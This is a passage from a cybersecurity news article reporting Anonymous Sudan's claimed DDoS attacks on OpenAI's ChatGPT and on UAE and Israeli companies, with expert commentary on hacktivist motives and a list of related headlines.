This isn’t the first instance where Anonymous Sudan has claimed responsibility for DDoSing ChatGPT. Last November, the group made similar claims, and OpenAI acknowledged that its infrastructure was indeed targeted by DDoS attacks.

For expert commentary, we reached out to Oded Vanunu, Head of Product Vulnerability Research at Check Point Software. Vanunu linked Anonymous Sudan’s DDoS attacks to a strategy aimed at garnering media attention.

“Russian-affiliated groups Anonymous Sudan and SkyNet have claimed responsibility for the latest outages on the OpenAI website and ChatGPT service. This is according to an ‘official spokesperson’ for Anonymous Sudan going by the name of Crush on Telegram,” said Oded.

“Hacktivists often look for high-profile targets to disrupt in order to bring attention to themselves and in this case, Crush claims the groups attacked OpenAI due to the company’s perceived support of Israel.”

****Anonymous Sudan’s Recent Activities****

Anonymous Sudan has been notably active in recent times. According to a recent report by Hackread.com, the group has conducted DDoS attacks on various targets, including the Israeli BAZAN Group and the United Arab Emirates-based FlyDubai Airline.

Furthermore, the group targeted Thuraya Mobile Satellite Communications Company, an international mobile-satellite service (MSS) provider headquartered in Dubai, United Arab Emirates (UAE). In both attacks on UAE-based infrastructure, Anonymous Sudan claimed that the UAE’s support for the Rapid Support Forces (RSF) was evident through communication channels.

It’s worth noting that the RSF is a paramilitary force previously operated by the Government of Sudan and has been accused by hacktivists of committing war crimes against the Sudanese people.

1.  **Hackers Target Israeli Rocket Alert App Users with Spyware**
2.  **10 Top DDoS Attack Protection and Mitigation Companies in 2023**
3.  **Google, Cloudflare and AWS Disclose Largest DDoS Attack in History**
4.  **Hackers Send Fake Rocket Alerts to Israelis via Hacked Red Alert App**
5.  **Researchers Leverage ChatGPT to Expose Notorious macOS Malware**
6.  **WormGPT – Malicious ChatGPT Alternative Empowering Cybercriminals**

Tag

#google